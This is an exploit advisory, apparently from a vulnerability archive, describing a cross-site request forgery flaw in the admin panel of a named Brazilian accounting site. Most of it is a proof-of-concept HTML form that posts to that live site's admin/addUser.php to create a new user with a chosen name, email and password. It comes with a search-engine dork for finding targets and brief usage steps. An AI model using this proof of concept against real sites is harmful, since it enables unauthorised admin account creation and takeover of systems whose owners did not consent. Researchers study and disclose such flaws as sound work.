Contábil Bandeirantes CSRF Vulnerability

2018.09.08
dz indoushka (DZ) dz
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

====================================================================================================================================== | # Title : Contábil Bandeirantes CSRF Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 61.0.1 (32-bit) | | # Vendor : http://rodyrafa.com.br/ | | # Dork : http://www.cbandeirantes.com.br/noticiasread.php?id_not=69 | ====================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine . [+] Save code as poc.html [+] <section id="main" class="column" style="height: 680px;"> <h4 class="alert_info">Necessário preencher todos os campos.</h4> <!--<h4 class="alert_warning">A Warning Alert</h4> <h4 class="alert_error">An Error Message</h4> <h4 class="alert_success">A Success Message</h4>--> <article class="module width_full"> <form action="http://www.cbandeirantes.com.br//admin/addUser.php" method="post" enctype="multipart/form-data" name="cadastroUser"> <header><h3>Adicionar Usuários</h3></header> <div class="module_content"> <fieldset> <label>Nome</label> <input name="nome" id="nome" value="" type="text"> </fieldset> <fieldset> <label>Email</label> <input name="email" id="email" value="" type="text"> </fieldset> <fieldset> <label>Senha</label> <input name="senha" id="senha" value="" type="text"> </fieldset> <div class="clear"></div> </div> <footer> <div class="submit_link"> <input id="limpar" name="limpar" value="limpar" type="submit"> <input name="cadastrar" value="Cadastrar" class="alt_btn" type="submit"> </div> </footer> </form> </article><!-- end of post new article --> <div class="spacer"></div> </section> Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh | | =======================================================================================================================================


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top